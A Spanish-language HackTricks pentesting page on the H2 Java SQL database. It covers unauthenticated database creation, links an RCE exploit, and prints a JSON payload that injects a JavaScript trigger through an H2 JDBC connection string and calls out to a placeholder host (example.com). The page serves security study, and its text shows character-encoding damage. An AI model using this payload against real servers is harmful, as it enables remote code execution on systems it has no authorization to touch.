H2 - Base de datos Java SQL
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
P谩gina oficial: https://www.h2database.com/html/main.html
Acceso
Puedes indicar un nombre de base de datos no existente para crear una nueva base de datos sin credenciales v谩lidas (no autenticado):
O si sabes que por ejemplo un mysql est谩 en ejecuci贸n y conoces el nombre de la base de datos y las credenciales para esa base de datos, puedes acceder a ella:
Truco de la caja Hawk de HTB.
RCE
Teniendo acceso para comunicarte con la base de datos H2, revisa este exploit para obtener RCE en ella: https://gist.github.com/h4ckninja/22b8e2d2f4c29e94121718a43ba97eed
Inyecci贸n SQL de H2 a RCE
En esta publicaci贸n se explica un payload para obtener RCE a trav茅s de una base de datos H2 abusando de una Inyecci贸n SQL.
[...]
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
[...]
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.